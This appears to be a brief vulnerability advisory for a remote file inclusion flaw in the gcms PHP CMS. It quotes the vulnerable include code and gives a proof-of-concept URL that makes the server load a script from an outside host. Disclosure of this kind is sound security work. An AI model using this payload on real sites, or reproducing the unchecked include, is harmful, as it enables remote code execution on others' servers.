Version: 1.1 Severity: High Vendor: http://gcms.graymur.net/ Vulnerable code is in "code/error.php": <----begin----> ... if (!isset($page)) $page = ''; if (!isset($path_prefix)) $path_prefix = '../'; if (empty($main)) { require $path_prefix.'code/main.dat'; } if (isset($e404) or isset($_GET['e404'])) { ... } if (isset($e403) or isset($_GET['e403'])) { ... } require $path_prefix.'code/blocks.php'; exit; <----end----> PoC: http://localhost/CMS/gcms/code/error.php?path_prefix=http://www.kiddiehost.com/ mail me: maggik <at> gala <dot> net icq: 3316667 greetz to: ghc, 0xdeadbabe, unl0ck & others
